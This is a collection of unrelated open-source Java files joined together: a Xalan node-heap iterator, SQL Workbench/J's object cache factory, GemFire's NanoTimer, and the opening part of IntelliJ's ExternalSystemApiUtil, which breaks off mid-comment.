return null;
}
clone._node = _node;
clone._markedNode = _node;
return clone;
}
/**
* Remembers the current node for the next call to {@link #gotoMark()}.
*/
public void setMark() {
_markedNode = _node;
}
/**
* Restores the current node remembered by {@link #setMark()}.
*/
public void gotoMark() {
_node = _markedNode;
}
/**
* Performs a comparison of the two heap nodes
*
* @param heapNode the heap node against which to compare
* @return <code>true</code> if and only if the current node for this
* heap node is before the current node of the argument heap
* node in document order.
*/
public abstract boolean isLessThan(HeapNode heapNode);
/**
* Sets context with respect to which this heap node is evaluated.
*
* @param node The new context node
* @return a {@link HeapNode} which may or may not be the same as
* this <code>HeapNode</code>.
*/
public abstract HeapNode setStartNode(int node);
/**
* Reset the heap node back to its beginning.
*
* @return a {@link HeapNode} which may or may not be the same as
* this <code>HeapNode</code>.
*/
public abstract HeapNode reset();
} // end of HeapNode
private static final int InitSize = 8;
private int _heapSize = 0;
private int _size = InitSize;
private HeapNode[] _heap = new HeapNode[InitSize];
private int _free = 0;
// Last node returned by this MultiValuedNodeHeapIterator to the caller of
// next; used to prune duplicates
private int _returnedLast;
// cached returned last for use in gotoMark
private int _cachedReturnedLast = END;
// cached heap size for use in gotoMark
private int _cachedHeapSize;
public DTMAxisIterator cloneIterator() {
_isRestartable = false;
final HeapNode[] heapCopy = new HeapNode[_heap.length];
try {
MultiValuedNodeHeapIterator clone =
(MultiValuedNodeHeapIterator)super.clone();
for (int i = 0; i < _free; i++) {
heapCopy[i] = _heap[i].cloneHeapNode();
}
clone.setRestartable(false);
clone._heap = heapCopy;
return clone.reset();
}
catch (CloneNotSupportedException e) {
BasisLibrary.runTimeError(BasisLibrary.ITERATOR_CLONE_ERR,
e.toString());
return null;
}
}
protected void addHeapNode(HeapNode node) {
if (_free == _size) {
HeapNode[] newArray = new HeapNode[_size *= 2];
System.arraycopy(_heap, 0, newArray, 0, _free);
_heap = newArray;
}
_heapSize++;
_heap[_free++] = node;
}
public int next() {
while (_heapSize > 0) {
final int smallest = _heap[0]._node;
if (smallest == END) { // iterator _heap[0] is done
if (_heapSize > 1) {
// Swap first and last (iterator must be restartable)
final HeapNode temp = _heap[0];
_heap[0] = _heap[--_heapSize];
_heap[_heapSize] = temp;
}
else {
return END;
}
}
else if (smallest == _returnedLast) { // duplicate
_heap[0].step(); // value consumed
}
else {
_heap[0].step(); // value consumed
heapify(0);
return returnNode(_returnedLast = smallest);
}
// fallthrough if not returned above
heapify(0);
}
return END;
}
public DTMAxisIterator setStartNode(int node) {
if (_isRestartable) {
_startNode = node;
for (int i = 0; i < _free; i++) {
if(!_heap[i]._isStartSet){
_heap[i].setStartNode(node);
_heap[i].step(); // to get the first node
_heap[i]._isStartSet = true;
}
}
// build heap
for (int i = (_heapSize = _free)/2; i >= 0; i--) {
heapify(i);
}
_returnedLast = END;
return resetPosition();
}
return this;
}
protected void init() {
for (int i =0; i < _free; i++) {
_heap[i] = null;
}
_heapSize = 0;
_free = 0;
}
/* Build a heap in document order. put the smallest node on the top.
* "smallest node" means the node before other nodes in document order
*/
private void heapify(int i) {
for (int r, l, smallest;;) {
r = (i + 1) << 1; l = r - 1;
smallest = l < _heapSize
&& _heap[l].isLessThan(_heap[i]) ? l : i;
if (r < _heapSize && _heap[r].isLessThan(_heap[smallest])) {
smallest = r;
}
if (smallest != i) {
final HeapNode temp = _heap[smallest];
_heap[smallest] = _heap[i];
_heap[i] = temp;
i = smallest;
} else {
break;
}
}
}
public void setMark() {
for (int i = 0; i < _free; i++) {
_heap[i].setMark();
}
_cachedReturnedLast = _returnedLast;
_cachedHeapSize = _heapSize;
}
public void gotoMark() {
for (int i = 0; i < _free; i++) {
_heap[i].gotoMark();
}
// rebuild heap after call last() function. fix for bug 20913
for (int i = (_heapSize = _cachedHeapSize)/2; i >= 0; i--) {
heapify(i);
}
_returnedLast = _cachedReturnedLast;
}
public DTMAxisIterator reset() {
for (int i = 0; i < _free; i++) {
_heap[i].reset();
_heap[i].step();
}
// build heap
for (int i = (_heapSize = _free)/2; i >= 0; i--) {
heapify(i);
}
_returnedLast = END;
return resetPosition();
}
}
|
|
/*
* DbObjectCacheFactory.java
*
* This file is part of SQL Workbench/J, http://www.sql-workbench.net
*
* Copyright 2002-2015, Thomas Kellerer
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at.
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
* To contact the author please send an email to: [email protected]
*
*/
package workbench.db.objectcache;
import java.beans.PropertyChangeEvent;
import java.beans.PropertyChangeListener;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;
import java.util.Set;
import workbench.log.LogMgr;
import workbench.resource.GuiSettings;
import workbench.db.ConnectionProfile;
import workbench.db.WbConnection;
import workbench.util.CollectionUtil;
/**
* A factory for DbObjectCache instances.
*
* For each unique JDBC URL (including the username) one instance of the cache will be maintained.
*
* @author Thomas Kellerer
*/
public class DbObjectCacheFactory
implements PropertyChangeListener
{
public static final long CACHE_VERSION_UID = 1L;
private final Object lock = new Object();
private final Map<String, ObjectCache> caches = new HashMap<>();
private final Map<String, Set<String>> refCounter = new HashMap<>();
/**
* Thread safe singleton-instance
*/
protected static class LazyInstanceHolder
{
protected static final DbObjectCacheFactory instance = new DbObjectCacheFactory();
}
public static DbObjectCacheFactory getInstance()
{
return LazyInstanceHolder.instance;
}
private DbObjectCacheFactory()
{
}
private void loadCache(ObjectCache cache, WbConnection connection)
{
if (cache == null || connection == null) return;
if (useLocalCacheStorage(connection))
{
synchronized (lock)
{
ObjectCachePersistence persistence = new ObjectCachePersistence();
persistence.loadFromLocalFile(cache, connection);
}
}
}
private void saveCache(ObjectCache cache, WbConnection connection)
{
if (useLocalCacheStorage(connection))
{
ObjectCachePersistence persistence = new ObjectCachePersistence();
persistence.saveToLocalFile(cache, connection);
}
}
private boolean useLocalCacheStorage(WbConnection connection)
{
if (connection == null) return false;
ObjectCacheStorage storage = GuiSettings.getLocalStorageForObjectCache();
switch (storage)
{
case always:
return true;
case never:
return false;
case profile:
ConnectionProfile profile = connection.getProfile();
if (profile != null)
{
return profile.getStoreCacheLocally();
}
default:
return false;
}
}
public DbObjectCache getCache(WbConnection connection)
{
if (connection == null) return null;
String key = makeKey(connection);
synchronized (lock)
{
ObjectCache cache = caches.get(key);
if (cache == null)
{
LogMgr.logDebug("DbObjectCacheFactory.getCache()", "Creating new cache for: " + key);
cache = new ObjectCache(connection);
caches.put(key, cache);
}
DbObjectCache result = new DbObjectCache(cache, connection);
connection.addChangeListener(this);
boolean isUsed = isCacheInUse(key);
if (!isUsed)
{
// first time used, load the local storage
loadCache(cache, connection);
}
increaseRefCount(key, connection.getId());
return result;
}
}
private int decreaseRefCount(String key, String connectionId)
{
Set<String> ids = refCounter.get(key);
if (ids == null)
{
return 0;
}
ids.remove(connectionId);
return ids.size();
}
private void increaseRefCount(String key, String connectionId)
{
Set<String> ids = refCounter.get(key);
if (ids == null)
{
ids = new HashSet<>();
refCounter.put(key, ids);
}
ids.add(connectionId);
}
private boolean isCacheInUse(String key)
{
Set<String> ids = refCounter.get(key);
return CollectionUtil.isNonEmpty(ids);
}
private String makeKey(WbConnection connection)
{
return connection.getProfile().getLoginUser()+ "@" + connection.getProfile().getUrl();
}
/**
* Notification about the state of the connection. If the connection
* is closed, we can dispose the object cache
*/
@Override
public void propertyChange(PropertyChangeEvent evt)
{
if (WbConnection.PROP_CONNECTION_STATE.equals(evt.getPropertyName()) &&
WbConnection.CONNECTION_CLOSED.equals(evt.getNewValue()))
{
WbConnection conn = (WbConnection)evt.getSource();
synchronized (lock)
{
String key = makeKey(conn);
ObjectCache cache = caches.get(key);
int refCount = decreaseRefCount(key, conn.getId());
LogMgr.logDebug("DbObjectCacheFactory.propertyChange()", "Connection with key=" + key + " was closed. Reference count for this cache is: " + refCount);
if (cache != null && refCount <= 0)
{
saveCache(cache, conn);
cache.clear();
caches.remove(key);
LogMgr.logDebug("DbObjectCacheFactory.propertyChange()", "Removed cache for key=" + key);
}
conn.removeChangeListener(this);
}
}
}
public void clear()
{
synchronized(lock)
{
for (ObjectCache cache : caches.values())
{
cache.clear();
}
caches.clear();
}
}
}
|
|
/*
* Copyright (c) 2010-2015 Pivotal Software, Inc. All rights reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you
* may not use this file except in compliance with the License. You
* may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
* implied. See the License for the specific language governing
* permissions and limitations under the License. See accompanying
* LICENSE file.
*/
package com.gemstone.gemfire.internal;
import com.gemstone.gemfire.internal.cache.GemFireCacheImpl;
import com.gemstone.gemfire.internal.shared.NativeCalls;
import com.gemstone.gemfire.internal.shared.SystemProperties;
/**
* A timer class that reports current or elapsed time in nanonseconds.
* The static method {@link #getTime} reports the current time.
* The instance methods support basic
* stop-watch-style functions that are convenient for simple performance
* measurements. For example:
* <pre>
class Example {
void example() {
NanoTimer timer = new NanoTimer();
for (int i = 0; i < n; ++i) {
someComputationThatYouAreMeasuring();
long duration = timer.reset();
System.out.println("Duration: " + duration);
// To avoid contaminating timing with printing times,
// you could call reset again here.
}
long average = timer.getTimeSinceConstruction() / n;
System.out.println("Average: " + average);
}
}
* </pre>
*
* @author Darrel Schneider
* @author Kirk Lund
*/
public final class NanoTimer {
public static final long NANOS_PER_MILLISECOND = 1000000;
private static boolean isNativeTimer;
private static final NativeCalls nativeCall = NativeCalls.getInstance();
public static int CLOCKID_BEST;
public static boolean CLOCKID_USE_SYSNANOTIME;
public final static String NATIVETIMER_TYPE_PROPERTY =
"gemfire.nativetimer.type";
public static int nativeTimerType;
static {
init();
}
public static void init() {
/*
* currently _nanoTime(..) isn't implemented in gemfire lib.
* for gemfirexd, its implemented only for Linux/Solaris as of now.
*
* TODO:SB: check for Mac linux variants.
*/
try {
isNativeTimer = GemFireCacheImpl.gfxdSystem()
&& NativeCalls.getInstance().loadNativeLibrary()
&& SharedLibrary.register("gemfirexd");
// test method call. can throw UnsatisfiedLinkError if unsuccessful.
_nanoTime(NativeCalls.CLOCKID_REALTIME);
} catch (Exception | UnsatisfiedLinkError e) {
isNativeTimer = false;
if (SharedLibrary.debug) {
SharedLibrary.logInitMessage(LogWriterImpl.WARNING_LEVEL,
"_nanoTime couldn't be invoked successfully.", e);
}
}
int clockIdBest = NativeCalls.CLOCKID_MONOTONIC;
if (isNativeTimer) {
final NativeCalls n = NativeCalls.getInstance();
if (n != null && n.isNativeTimerEnabled()) {
final String msg = "nanoTime clock resolution: MONOTONIC="
+ n.clockResolution(NativeCalls.CLOCKID_MONOTONIC)
+ " CLOCK_PROCESS_CPUTIME_ID="
+ n.clockResolution(NativeCalls.CLOCKID_PROCESS_CPUTIME_ID)
+ " CLOCK_THREAD_CPUTIME_ID="
+ n.clockResolution(NativeCalls.CLOCKID_THREAD_CPUTIME_ID);
SharedLibrary.logInitMessage(LogWriterImpl.INFO_LEVEL, msg, null);
String testMsg = "nanoTime time taken for call+loop:";
// don't really believe clock_getres
// clockIds listed in order of preference; MONOTONIC highest
// preference since if it is proper then it is most efficient
// via System.nanoTime() itself
int[] clockIds = { NativeCalls.CLOCKID_PROCESS_CPUTIME_ID,
NativeCalls.CLOCKID_THREAD_CPUTIME_ID,
NativeCalls.CLOCKID_MONOTONIC };
// keep some warmup runs
int numRuns = 5;
while (numRuns-- > 0) {
clockIdBest = NativeCalls.CLOCKID_MONOTONIC;
for (int clockId : clockIds) {
int sum = 0;
long start = _nanoTime(clockId);
for (int i = 0; i < 50; i++) {
sum += i;
}
long end = _nanoTime(clockId);
if (numRuns == 0) {
testMsg += " CLOCKID=" + clockId + " time=" + (end - start)
+ "nanos (sum=" + sum + ')';
}
if (end > start) {
clockIdBest = clockId;
}
}
}
SharedLibrary.logInitMessage(LogWriterImpl.FINE_LEVEL, testMsg, null);
}
}
CLOCKID_BEST = clockIdBest;
SharedLibrary.logInitMessage(LogWriterImpl.FINE_LEVEL,
"Choosing CLOCKID=" + CLOCKID_BEST, null);
setNativeTimer(true,
getNativeTimerTypeFromString(SystemProperties.getServerInstance()
.getString(NATIVETIMER_TYPE_PROPERTY, "DEFAULT")));
}
/**
* implemented in utils.c (@see com/pivotal/gemfirexd/internal/engine) & packed
* into gemfirexd native library. any change in the implementation should be
* recompiled using gfxd-rebuild-shared-library after incrementing the library
* version (gemfirexd.native.version) in the build script.
*
* @param clk_id
* enumeration constants as defined here.
*/
public static native long _nanoTime(int clk_id);
/**
* The timestamp taken when this timer was constructed.
*/
private final long constructionTime;
/**
* The timestamp taken when this timer was last reset or constructed.
*/
private long lastResetTime;
/**
* Create a NanoTimer.
*/
public NanoTimer() {
this.lastResetTime = getTime();
this.constructionTime = this.lastResetTime;
}
/**
* Converts nanoseconds to milliseconds by dividing nanos by
* {@link #NANOS_PER_MILLISECOND}.
*
* @param nanos value in nanoseconds
* @return value converted to milliseconds
*/
public static long nanosToMillis(long nanos) {
return nanos / NANOS_PER_MILLISECOND;
}
/**
* Converts milliseconds to nanoseconds by multiplying millis by
* {@link #NANOS_PER_MILLISECOND}.
*
* @param millis value in milliseconds
* @return value converted to nanoseconds
*/
public static long millisToNanos(long millis) {
return millis * NANOS_PER_MILLISECOND;
}
/**
* Return the time in nanoseconds since some arbitrary time in the past.
* The time rolls over to zero every 2^64 nanosecs (approx 584 years).
* Interval computations spanning periods longer than this will be wrong.
*/
public static long getTime() {
return java.lang.System.nanoTime();
}
/**
* Indicates whether native library will be used.
*
* @return returns whether JNI based timer is enabled.
*/
public static final boolean isJNINativeTimerEnabled() {
return isNativeTimer;
}
/**
* Check native timer using jni/jna is implemented in this platform.
*
* @return true if using o/s level system call via jni otherwise false.
* @see #isJNINativeTimerEnabled()
*/
public static final boolean isNativeTimerEnabled() {
return isNativeTimer || nativeCall.isNativeTimerEnabled();
}
/**
* Nanosecond precision performance counter using native system call. calling
* overhead is listed below for various kinds of clocks. if high precision
* counter is unsupported by the o/s or high precision clock isn't implemented
* yet, falls back to java.lang.System.nanoTime.<br>
*
* The values for <code>clock_id</code> argument now reside in
* {@link NativeCalls} class.
*
* @param clock_id
* <dl>
* <dt>CLOCK_THREAD_CPUTIME_ID</dt>
* <U>In Linux:<br>
* </U> Average overhead is ~120 nanosecond irrespective of number of
* threads. This is because it provides thread work time excluding
* unscheduled wait time by the o/s (@see clock_gettime). <br>
* <br>
*
* <dt>CLOCK_PROCESS_CPUTIME_ID</dt>
* <U>In Linux:<br>
* </U> Average overhead varies depending on number of concurrent
* threads. For single threaded call it incurs ~5 to ~11 microsecond
* <br>
* <br>
*
* <dt>CLOCK_REALTIME, CLOCK_MONOTONIC, CLOCK_MONOTONIC_RAW</dt>
* <U>In Linux:<br>
* </U> Yields similar performance as o/s clock resolution offered by
* java.lang.System.nanoTime.
* </dl>
*
* @param useJNA
* if false, avoids JNA system call. if true, attempts to use jni for
* implemented platforms otherwise uses jna implementation. if
* neither is supported, returns System.nanoTime.
*
* @see #isNativeTimerEnabled()
* @return performance counter long value.
*/
public static final long nativeNanoTime(final int clock_id,
final boolean useJNA) {
return (isNativeTimer ? _nanoTime(clock_id)
: (useJNA ? NativeCalls.getInstance().nanoTime(clock_id)
: java.lang.System.nanoTime()));
}
/**
*
* This function was added because the call to {@link #nativeNanoTime(int, boolean)} with
* CLOCKID_PROCESS_CPUTIME_ID is taking few milliseconds. With this, EXPLAIN query
* scenarios are terribly slow because there can be millions of calls to nanoTime.
* java.lang.System.nanoTime() should be perfect in most of the cases because the
* timer resolution is 1 ns and timer speed is few tens of nano seconds. Making it
* as the default behavior. If {@link #NATIVETIMER_TYPE_PROPERTY} is set then
* native timer of the specified type is used.
*/
public static final long nanoTime() {
return CLOCKID_USE_SYSNANOTIME ? java.lang.System.nanoTime()
: nativeNanoTime(nativeTimerType, true);
}
/**
* Return the construction time in nanoseconds since some arbitrary time
* in the past.
*
* @return timestamp in nanoseconds since construction.
*/
public long getConstructionTime() {
return this.constructionTime;
}
/**
* Return the last reset time in naonseconds since some arbitrary time
* in the past.
* <p/>
* The time rolls over to zero every 2^64 nanosecs (approx 584 years).
* Interval computations spanning periods longer than this will be wrong.
* If the timer has not yet been reset then the construction time
* is returned.
*
* @return timestamp in nanoseconds of construction or the last reset.
*/
public long getLastResetTime() {
return this.lastResetTime;
}
/**
* Compute and return the time in nanoseconds since the last reset or
* construction of this timer, and reset the timer to the current
* {@link #getTime}.
*
* @return time in nanoseconds since construction or last reset.
*/
public long reset() {
long save = this.lastResetTime;
this.lastResetTime = getTime();
return this.lastResetTime - save;
}
/**
* Compute and return the time in nanoseconds since the last reset or
* construction of this Timer, but does not reset this timer.
*
* @return time in nanoseconds since construction or last reset.
*/
public long getTimeSinceReset() {
return getTime() - this.lastResetTime;
}
/**
* Compute and return the time in nanoseconds since this timer was
* constructed.
*
* @return time in nanoseconds since construction.
*/
public long getTimeSinceConstruction() {
return getTime() - this.constructionTime;
}
static final int getNativeTimerTypeFromString(String timerType) {
timerType = timerType.toUpperCase();
if (timerType.equals("CLOCK_REALTIME")) {
return NativeCalls.CLOCKID_REALTIME;
} else if (timerType.equals("CLOCK_MONOTONIC")) {
return NativeCalls.CLOCKID_MONOTONIC;
} else if (timerType.equals("CLOCK_PROCESS_CPUTIME_ID")) {
return NativeCalls.CLOCKID_PROCESS_CPUTIME_ID;
} else if (timerType.equals("CLOCK_THREAD_CPUTIME_ID")) {
return NativeCalls.CLOCKID_THREAD_CPUTIME_ID;
} else if (timerType.equals("CLOCK_MONOTONIC_RAW")) {
return NativeCalls.CLOCKID_MONOTONIC_RAW;
} else if (timerType.equals("DEFAULT")) {
return CLOCKID_BEST;
} else {
throw new IllegalArgumentException(
"Unknown native clockId type = " + timerType);
}
}
public static final void setNativeTimer(boolean nativeTimer,
String timerType) {
setNativeTimer(nativeTimer, getNativeTimerTypeFromString(timerType));
}
static final void setNativeTimer(boolean nativeTimer, int timerType) {
if (nativeTimer) {
nativeTimerType = timerType;
CLOCKID_USE_SYSNANOTIME = (timerType == NativeCalls.CLOCKID_MONOTONIC);
} else {
// reset to default timer type ignoring the actual argument
nativeTimerType = NativeCalls.CLOCKID_MONOTONIC;
CLOCKID_USE_SYSNANOTIME = true;
}
}
public static final boolean getIsNativeTimer() {
return nativeTimerType != NativeCalls.CLOCKID_MONOTONIC;
}
public static final String getNativeTimerType() {
switch (nativeTimerType) {
case NativeCalls.CLOCKID_REALTIME:
return "CLOCK_REALTIME";
case NativeCalls.CLOCKID_MONOTONIC:
return "CLOCK_MONOTONIC";
case NativeCalls.CLOCKID_PROCESS_CPUTIME_ID:
return "CLOCK_PROCESS_CPUTIME_ID";
case NativeCalls.CLOCKID_THREAD_CPUTIME_ID:
return "CLOCK_THREAD_CPUTIME_ID";
case NativeCalls.CLOCKID_MONOTONIC_RAW:
return "CLOCK_MONOTONIC_RAW";
default:
return "UNKNOWN";
}
}
}
|
|
/*
* Copyright 2000-2013 JetBrains s.r.o.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.intellij.openapi.externalSystem.util;
import com.intellij.execution.rmi.RemoteUtil;
import com.intellij.ide.util.PropertiesComponent;
import com.intellij.openapi.application.ApplicationManager;
import com.intellij.openapi.application.PathManager;
import com.intellij.openapi.diagnostic.Logger;
import com.intellij.openapi.externalSystem.ExternalSystemAutoImportAware;
import com.intellij.openapi.externalSystem.ExternalSystemManager;
import com.intellij.openapi.externalSystem.model.DataNode;
import com.intellij.openapi.externalSystem.model.ExternalSystemException;
import com.intellij.openapi.externalSystem.model.Key;
import com.intellij.openapi.externalSystem.model.ProjectSystemId;
import com.intellij.openapi.fileTypes.FileTypes;
import com.intellij.openapi.project.Project;
import com.intellij.openapi.project.ProjectManager;
import com.intellij.openapi.roots.OrderRootType;
import com.intellij.openapi.roots.libraries.Library;
import com.intellij.openapi.util.AtomicNotNullLazyValue;
import com.intellij.openapi.util.NotNullLazyValue;
import com.intellij.openapi.util.io.FileUtil;
import com.intellij.openapi.util.text.StringUtil;
import com.intellij.openapi.vfs.JarFileSystem;
import com.intellij.openapi.vfs.VirtualFile;
import com.intellij.util.BooleanFunction;
import com.intellij.util.NullableFunction;
import com.intellij.util.PathUtil;
import com.intellij.util.PathsList;
import com.intellij.util.containers.ContainerUtilRt;
import com.intellij.util.ui.UIUtil;
import org.jetbrains.annotations.NotNull;
import org.jetbrains.annotations.Nullable;
import java.io.File;
import java.io.PrintWriter;
import java.io.StringWriter;
import java.util.*;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
/**
* @author Denis Zhdanov
* @since 4/1/13 1:31 PM
*/
public class ExternalSystemApiUtil {
private static final Logger LOG = Logger.getInstance("#" + ExternalSystemApiUtil.class.getName());
private static final String LAST_USED_PROJECT_PATH_PREFIX = "LAST_EXTERNAL_PROJECT_PATH_";
@NotNull public static final String PATH_SEPARATOR = "/";
@NotNull private static final Pattern ARTIFACT_PATTERN = Pattern.compile("(?:.*/)?(.+?)(?:-([\\d+](?:\\.[\\d]+)*))?(?:\\.[^\\.]+?)?");
@NotNull private static final NotNullLazyValue<Map<ProjectSystemId, ExternalSystemManager<?, ?, ?, ?, ?>>> MANAGERS =
new AtomicNotNullLazyValue<Map<ProjectSystemId, ExternalSystemManager<?, ?, ?, ?, ?>>>() {
@NotNull
@Override
protected Map<ProjectSystemId, ExternalSystemManager<?, ?, ?, ?, ?>> compute() {
Map<ProjectSystemId, ExternalSystemManager<?, ?, ?, ?, ?>> result = ContainerUtilRt.newHashMap();
for (ExternalSystemManager manager : ExternalSystemManager.EP_NAME.getExtensions()) {
result.put(manager.getSystemId(), manager);
}
return result;
}
};
@NotNull public static final Comparator<Object> ORDER_AWARE_COMPARATOR = new Comparator<Object>() {
@Override
public int compare(Object o1, Object o2) {
int order1 = getOrder(o1);
int order2 = getOrder(o2);
return order1 > order2 ? 1 : order1 < order2 ? -1 : 0;
}
private int getOrder(@NotNull Object o) {
Queue<Class<?>> toCheck = new ArrayDeque<Class<?>>();
toCheck.add(o.getClass());
while (!toCheck.isEmpty()) {
Class<?> clazz = toCheck.poll();
Order annotation = clazz.getAnnotation(Order.class);
if (annotation != null) {
return annotation.value();
}
toCheck.add(clazz.getSuperclass());
Class<?>[] interfaces = clazz.getInterfaces();
if (interfaces != null) {
Collections.addAll(toCheck, interfaces);
}
}
return ExternalSystemConstants.UNORDERED;
}
};
@NotNull private static final NullableFunction<DataNode<?>, Key<?>> GROUPER = new NullableFunction<DataNode<?>, Key<?>>() {
@Override
public Key<?> fun(DataNode<?> node) {
return node.getKey();
}
};
@NotNull private static final Comparator<Object> COMPARABLE_GLUE = new Comparator<Object>() {
@SuppressWarnings("unchecked")
@Override
public int compare(Object o1, Object o2) {
return ((Comparable)o1).compareTo(o2);
}
};
private ExternalSystemApiUtil() {
}
@NotNull
public static String extractNameFromPath(@NotNull String path) {
String strippedPath = stripPath(path);
final int i = strippedPath.lastIndexOf(PATH_SEPARATOR);
final String result;
if (i < 0 || i >= strippedPath.length() - 1) {
result = strippedPath;
}
else {
result = strippedPath.substring(i + 1);
}
return result;
}
@NotNull
private static String stripPath(@NotNull String path) {
String[] endingsToStrip = {"/", "!", ".jar"};
StringBuilder buffer = new StringBuilder(path);
for (String ending : endingsToStrip) {
if (buffer.lastIndexOf(ending) == buffer.length() - ending.length()) {
buffer.setLength(buffer.length() - ending.length());
}
}
return buffer.toString();
}
@NotNull
public static String getLibraryName(@NotNull Library library) {
final String result = library.getName();
if (result != null) {
return result;
}
for (OrderRootType type : OrderRootType.getAllTypes()) {
for (String url : library.getUrls(type)) {
String candidate = extractNameFromPath(url);
if (!StringUtil.isEmpty(candidate)) {
return candidate;
}
}
}
assert false;
return "unknown-lib";
}
@Nullable
public static ArtifactInfo parseArtifactInfo(@NotNull String fileName) {
Matcher matcher = ARTIFACT_PATTERN.matcher(fileName);
if (!matcher.matches()) {
return null;
}
return new ArtifactInfo(matcher.group(1), null, matcher.group(2));
}
public static void orderAwareSort(@NotNull List<?> data) {
Collections.sort(data, ORDER_AWARE_COMPARATOR);
}
/**
* @param path target path
* @return absolute path that points to the same location as the given one and that uses only slashes
*/
@NotNull
public static String toCanonicalPath(@NotNull String path) {
String p = normalizePath(new File(path).getAbsolutePath());
assert p != null;
return PathUtil.getCanonicalPath(p);
}
@NotNull
public static String getLocalFileSystemPath(@NotNull VirtualFile file) {
if (file.getFileType() == FileTypes.ARCHIVE) {
final VirtualFile jar = JarFileSystem.getInstance().getVirtualFileForJar(file);
if (jar != null) {
return jar.getPath();
}
}
return toCanonicalPath(file.getPath());
}
@Nullable
public static ExternalSystemManager<?, ?, ?, ?, ?> getManager(@NotNull ProjectSystemId externalSystemId) {
return MANAGERS.getValue().get(externalSystemId);
}
public static Collection<ExternalSystemManager<?, ?, ?, ?, ?>> getAllManagers() {
return MANAGERS.getValue().values();
}
@NotNull
public static Map<Key<?>, List<DataNode<?>>> group(@NotNull Collection<DataNode<?>> nodes) {
return groupBy(nodes, GROUPER);
}
@NotNull
public static <K, V> Map<DataNode<K>, List<DataNode<V>>> groupBy(@NotNull Collection<DataNode<V>> nodes, @NotNull final Key<K> key) {
return groupBy(nodes, new NullableFunction<DataNode<V>, DataNode<K>>() {
@Nullable
@Override
public DataNode<K> fun(DataNode<V> node) {
return node.getDataNode(key);
}
});
}
@NotNull
public static <K, V> Map<K, List<V>> groupBy(@NotNull Collection<V> nodes, @NotNull NullableFunction<V, K> grouper) {
Map<K, List<V>> result = ContainerUtilRt.newHashMap();
for (V data : nodes) {
K key = grouper.fun(data);
if (key == null) {
LOG.warn(String.format(
"Skipping entry '%s' during grouping. Reason: it's not possible to build a grouping key with grouping strategy '%s'. "
+ "Given entries: %s",
data,
grouper.getClass(),
nodes));
continue;
}
List<V> grouped = result.get(key);
if (grouped == null) {
result.put(key, grouped = ContainerUtilRt.newArrayList());
}
grouped.add(data);
}
if (!result.isEmpty() && result.keySet().iterator().next() instanceof Comparable) {
List<K> ordered = ContainerUtilRt.newArrayList(result.keySet());
Collections.sort(ordered, COMPARABLE_GLUE);
Map<K, List<V>> orderedResult = ContainerUtilRt.newLinkedHashMap();
for (K k : ordered) {
orderedResult.put(k, result.get(k));
}
return orderedResult;
}
return result;
}
@SuppressWarnings("unchecked")
@NotNull
public static <T> Collection<DataNode<T>> getChildren(@NotNull DataNode<?> node, @NotNull Key<T> key) {
Collection<DataNode<T>> result = null;
for (DataNode<?> child : node.getChildren()) {
if (!key.equals(child.getKey())) {
continue;
}
if (result == null) {
result = ContainerUtilRt.newArrayList();
}
result.add((DataNode<T>)child);
}
return result == null ? Collections.<DataNode<T>>emptyList() : result;
}
@SuppressWarnings("unchecked")
@Nullable
public static <T> DataNode<T> find(@NotNull DataNode<?> node, @NotNull Key<T> key) {
for (DataNode<?> child : node.getChildren()) {
if (key.equals(child.getKey())) {
return (DataNode<T>)child;
}
}
return null;
}
@SuppressWarnings("unchecked")
@Nullable
public static <T> DataNode<T> find(@NotNull DataNode<?> node, @NotNull Key<T> key, BooleanFunction<DataNode<T>> predicate) {
for (DataNode<?> child : node.getChildren()) {
if (key.equals(child.getKey()) && predicate.fun((DataNode<T>)child)) {
return (DataNode<T>)child;
}
}
return null;
}
@SuppressWarnings("unchecked")
@NotNull
public static <T> Collection<DataNode<T>> findAll(@NotNull DataNode<?> parent, @NotNull Key<T> key) {
Collection<DataNode<T>> result = null;
for (DataNode<?> child : parent.getChildren()) {
if (!key.equals(child.getKey())) {
continue;
}
if (result == null) {
result = ContainerUtilRt.newArrayList();
}
result.add((DataNode<T>)child);
}
return result == null ? Collections.<DataNode<T>>emptyList() : result;
}
public static void executeProjectChangeAction(@NotNull final Runnable task) {
executeProjectChangeAction(false, task);
}
public static void executeProjectChangeAction(boolean synchronous, @NotNull final Runnable task) {
executeOnEdt(synchronous, new Runnable() {
public void run() {
ApplicationManager.getApplication().runWriteAction(new Runnable() {
@Override
public void run() {
task.run();
}
});
}
});
}
public static void executeOnEdt(boolean synchronous, @NotNull Runnable task) {
if (synchronous) {
if (ApplicationManager.getApplication().isDispatchThread()) {
task.run();
}
else {
UIUtil.invokeAndWaitIfNeeded(task);
}
}
else {
UIUtil.invokeLaterIfNeeded(task);
}
}
/**
* Configures given classpath to reference target i18n bundle file(s).
*
* @param classPath process classpath
* @param bundlePath path to the target bundle file
* @param contextClass class from the same content root as the target bundle file
*/
public static void addBundle(@NotNull PathsList classPath, @NotNull String bundlePath, @NotNull Class<?> contextClass) {
String pathToUse = bundlePath.replace('.', '/');
if (!pathToUse.endsWith(".properties")) {
pathToUse += ".properties";
}
if (!pathToUse.startsWith("/")) {
pathToUse = '/' + pathToUse;
}
String root = PathManager.getResourceRoot(contextClass, pathToUse);
if (root != null) {
classPath.add(root);
}
}
@SuppressWarnings("ConstantConditions")
@Nullable
public static String normalizePath(@Nullable String s) {
return StringUtil.isEmpty(s) ? null : s.replace('\\', ExternalSystemConstants.PATH_SEPARATOR);
}
/**
* We can divide all 'import from external system' use-cases into at least as below:
* <pre>
* <ul>
